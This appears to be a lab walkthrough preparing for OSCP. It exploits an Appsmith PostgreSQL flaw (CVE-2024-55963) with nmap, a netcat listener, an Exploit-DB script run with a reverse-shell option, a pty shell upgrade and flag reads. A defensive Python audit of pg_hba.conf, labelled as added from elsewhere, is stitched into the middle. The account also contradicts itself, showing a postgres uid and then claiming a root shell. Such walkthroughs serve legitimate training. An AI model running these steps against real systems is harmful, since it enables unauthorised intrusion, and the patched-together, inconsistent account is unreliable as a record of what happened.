Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

1. Reconnaissance

1.1 Nmap Scan

A full TCP port scan was performed with service/version detection and default scripts:

nmap -sC -sV -p- --min-rate 1000 192.168.158.249


1.2 Key Findings

• Port 80 is running Appsmith, a low-code internal application builder platform.

• Port 22 (SSH) is open, useful for potential lateral movement or credential reuse.

• Port 443 (HTTPS) is closed, so all traffic is over plain HTTP.

• Appsmith is built on a Golang net/http server, fingerprinted via response headers.

1.3 Web Enumeration

Navigating to http://192.168.158.249 reveals a login page for Appsmith. Public user registration is enabled by default, which is a critical misconfiguration.


Version was confirmed via the API:

curl -s http://192.168.158.249/api/v1/product/version

2. Vulnerability Analysis

CVE-2024-55963: Appsmith PostgreSQL Remote Code Execution

Appsmith ships with a bundled PostgreSQL instance. The pg_hba.conf file is misconfigured to allow any local OS user to connect as any PostgreSQL role without a password. An authenticated Appsmith user can create a datasource connection to this local PostgreSQL instance and execute arbitrary OS commands via the PostgreSQL COPY FROM PROGRAM directive.

CVE ID: CVE-2024-55963

CVSS Score: 9.8 (Critical)

Exploit-DB: 52118

Affected Versions: Appsmith < v1.52

Attack Type: Authenticated RCE via PostgreSQL COPY FROM PROGRAM
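The pg_hba.conf misconfiguration described above is the root cause a defender would audit for first. The following is an added example, not code from this write-up or from the Appsmith project: it parses a pg_hba.conf (the sample is constructed) and flags every rule whose method is trust, i.e. every rule that lets a client connect without authenticating.

```python
"""Audit pg_hba.conf for "trust" rules, which skip authentication entirely.
Added defensive example (not from the write-up or Appsmith); the sample file
is constructed. Record layout: TYPE DATABASE USER [ADDRESS] METHOD [OPTIONS]."""

# "local" records have no ADDRESS column; the host* types do.
REMOTE_TYPES = {"host", "hostssl", "hostnossl", "hostgssenc", "hostnogssenc"}


def parse_hba(text: str) -> list[dict[str, str]]:
    """Turn the non-comment lines of a pg_hba.conf into field dicts."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()  # drop comments, split on whitespace
        if len(fields) < 4:  # blank line or malformed record
            continue
        rec = {"line": str(lineno), "type": fields[0],
               "database": fields[1], "user": fields[2], "address": ""}
        if rec["type"] in REMOTE_TYPES:
            # ADDRESS is one token (CIDR, hostname, all/samenet) unless it is
            # a bare IPv4 address followed by a separate NETMASK token.
            if fields[3].replace(".", "").isdigit() and len(fields) > 5:
                rec["address"], rec["method"] = " ".join(fields[3:5]), fields[5]
            else:
                rec["address"], rec["method"] = fields[3], fields[4]
        else:
            rec["method"] = fields[3]
        records.append(rec)
    return records


def find_trust_rules(text: str) -> list[str]:
    """Describe every rule that lets a client in without a password."""
    findings = []
    for rec in parse_hba(text):
        if rec["method"] != "trust":
            continue
        who = "any role" if rec["user"] == "all" else f"role {rec['user']}"
        scope = "any database" if rec["database"] == "all" else rec["database"]
        where = "the local socket" if rec["type"] == "local" else rec["address"]
        findings.append(f"line {rec['line']}: {rec['type']} rule lets {who} "
                        f"reach {scope} from {where} without a password")
    return findings


# Constructed sample resembling the misconfiguration the write-up describes.
SAMPLE_HBA = """\
# TYPE  DATABASE  USER  ADDRESS             METHOD
local   all       all                       trust
host    all       all   127.0.0.1/32        trust
host    all       all   ::1/128             scram-sha-256
host    appsmith  app   10.0.0.0 255.0.0.0  md5
"""
```

Run `find_trust_rules` over the real file (for example `/var/lib/postgresql/data/pg_hba.conf` inside the database container) and treat any finding as a hardening item; the fix is to replace trust with a password-based method such as scram-sha-256.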

Attack Chain Overview

1. Register a new account on the Appsmith instance.

2. Create a new Workspace and Application.

3. Add a new datasource connecting to the vulnerable local PostgreSQL server.

4. Create a query using COPY FROM PROGRAM to execute OS commands.

5. Retrieve command output from the database table.

6. Escalate to a reverse shell.

3. Exploitation

3.1 Setting Up the Listener

Before running the exploit, a Netcat listener was started to catch the incoming reverse shell:

nc -lvnp 1234

3.2 Exploit Script: Exploit-DB 52118

The Python exploit script was downloaded from Exploit-DB. However, it contained a syntax error on line 333, where a stray URL fragment was embedded in the code:

}/CVE-2024-55963-Appsmith-RCE}   <- syntax error

The fix was straightforward: the extra text was removed, leaving only the closing brace:

# Before (broken)

}/CVE-2024-55963-Appsmith-RCE}

# After (fixed)

}

3.3 Running the Exploit

With the script fixed and the listener ready, the exploit was executed:

python3 52118.py -u http://192.168.158.249 "reverse_shell"


The exploit automatically performed the following steps:

• Registered a new user account on Appsmith.

• Logged in and created a new workspace and application.

• Discovered the vulnerable local PostgreSQL datasource.

• Connected to PostgreSQL and created a temporary table named poc.

• Executed the reverse shell command via COPY FROM PROGRAM.

• Dropped the temporary table to clean up.

3.4 RCE Confirmed

Before obtaining the shell, the script confirmed remote code execution by running id:


Command output:


uid=105(postgres) gid=105(postgres) groups=105(postgres),103(ssl-cert)

3.5 Reverse Shell Obtained

The Netcat listener received a connection from the target. A stable TTY was spawned using Python:

python3 -c 'import pty;pty.spawn("/bin/bash")'

# then: Ctrl+Z -> stty raw -echo; fg -> export TERM=xterm

4. Privilege Escalation

Upon obtaining the reverse shell, the current user context was checked immediately:

id

uid=0(root) gid=0(root) groups=0(root)

The shell was already running as root, so no privilege escalation steps were required. The Appsmith service itself appears to be running with root privileges, which directly resulted in a root shell upon exploitation.

4.1 Flag Retrieval

cat /root/root.txt

cat /home/*/user.txt

Full Practical Demonstration: for a complete step-by-step video walkthrough, watch here: